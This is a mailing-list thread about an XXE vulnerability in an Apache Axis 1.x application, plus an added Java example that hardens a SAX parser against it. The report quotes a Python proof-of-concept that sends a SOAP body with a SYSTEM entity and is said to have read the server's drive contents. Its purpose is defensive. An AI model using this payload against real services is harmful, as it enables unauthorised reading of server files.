axis-java-dev mailing list archives

From Andreas Veithen <andreas.veit...@gmail.com>
Subject Re: XXE DTD Issue :- Urgent !!
Date Sat, 18 Aug 2018 23:07:44 GMT
On Fri, Aug 17, 2018 at 12:50 PM Ronak Sharda <ronak.sharda@aricent.com> wrote:
>
> Hi Team,
>
> Greetings for the day !
>
> We are working on an application where an XML External Entity Injection Vulnerability issue has come across.
>
> SOAP Interaction between Client and Server when Entity Doctype tag is introduced:-
>
> Currently Axis 1.0 jar is being used in the application.
>
> headers = {'content-type': 'text/xml', 'SOAPAction':'' }
>
> body = """<!DOCTYPE getAccountDataTemplate [ <!ENTITY file SYSTEM "%s"> ]>
>           <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:enc="XXXXXXXXXXXXXXXXXXXXXXXX">
>           <soapenv:Header/>
>           <soapenv:Body>
>           <enc:getAccountDataTemplate soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
>           <templateId xsi:type="xsd:string">&file;</templateId>
>           </enc:getAccountDataTemplate>
>           </soapenv:Body>
>           </soapenv:Envelope>""" % fpath
>
> with requests.Session() as session:
>     download_req = session.post( xurl + "XXXXXXXXXXXXXXXXXXXXXXXX", data = body , headers=headers, verify=False, allow_redirects=True)
>     print download_req.text
>
>                 XXXXXXXXXXXXXXXXXXXXXXXX :- Service URL
>
>                 Actual Output:- Execution of this script results in printing of the contents of the drive of the system.
>
>                 Expected Output:- Drive content should not be shown, inline DTD parsing should be disabled.
>
> To overcome the above problem, Axis 1.0 jar is replaced with upgraded version i.e. Axis 1.4.
>
> Actual Output:- Execution of the script in point 1 results in the below Exception:
>
> <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><soapenv:Fault><faultcode>soapenv:Server.userException</faultcode><faultstring>org.xml.sax.SAXException: Processing instructions are not allowed within SOAP messages</faultstring><detail><ns1:hostname xmlns:ns1="http://xml.apache.org/axis/">WIN-6A0L1CSU3OS</ns1:hostname></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
>
>                 Along with the above output, application breaks since there are multiple SOAP calls that interact within the application (client and server).

Can you explain this a bit more?

>
> Expected Output:- Inline DTD Parsing should be disabled, and the application should not break.
>
>                 Any help in this context is highly appreciated. Looking forward to the response.
>
>                 NOTE:- We won't be able to upgrade the jar to Axis2, since it is a Legacy application and it will be a gigantic change to work with.
>
> Kindly let us know if any other information related to the above task/issue is needed of us.
>
> Regards,
>
> Ronak Sharda
>

---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscribe@axis.apache.org
For additional commands, e-mail: java-dev-help@axis.apache.org

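As an added illustration of the mitigation the thread asks for (inline DTD parsing disabled without breaking ordinary SOAP calls), here is a hardened SAX reader in Java; this is example code written for this page, not Axis code, and wiring it into Axis 1.x's own message parsing is not shown. The two envelopes, the class name and the placeholder SYSTEM URI are constructed for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

public final class NoDtdSoapParser {
    // Constructed sample: the inline-DTD envelope shape from the thread, with a
    // harmless placeholder instead of a real SYSTEM path.
    static final String DOCTYPE_ENVELOPE =
        "<!DOCTYPE getAccountDataTemplate [ <!ENTITY file SYSTEM \"file:///placeholder\"> ]>"
      + "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
      + "<soapenv:Body><templateId>&file;</templateId></soapenv:Body></soapenv:Envelope>";
    // Constructed sample: the same call as a normal client sends it, with no DOCTYPE.
    static final String CLEAN_ENVELOPE =
        "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
      + "<soapenv:Body><templateId>tpl-1</templateId></soapenv:Body></soapenv:Envelope>";
    // Builds a SAX reader that treats any DOCTYPE as a fatal error and, as defence in
    // depth for parsers lacking that feature, never fetches external entities or DTDs.
    static XMLReader hardenedReader() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        XMLReader reader = f.newSAXParser().getXMLReader();
        // Last line of defence: any external reference that still gets resolved is empty.
        reader.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
        return reader;
    }
    // Returns true when the envelope parses, false when the hardened reader rejects it.
    static boolean accepts(String envelope) throws Exception {
        XMLReader reader = hardenedReader();
        reader.setContentHandler(new DefaultHandler()); // fatalError() rethrows the SAXParseException
        try {
            reader.parse(new InputSource(new ByteArrayInputStream(envelope.getBytes(StandardCharsets.UTF_8))));
            return true;
        } catch (SAXException rejected) {
            return false;
        }
    }
    public static void main(String[] args) throws Exception {
        System.out.println("DOCTYPE envelope accepted: " + accepts(DOCTYPE_ENVELOPE));
        System.out.println("clean envelope accepted:   " + accepts(CLEAN_ENVELOPE));
    }
}
```

The DOCTYPE envelope is rejected before any entity is expanded, while the clean envelope still parses, which is the behaviour the thread wants from the server side.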
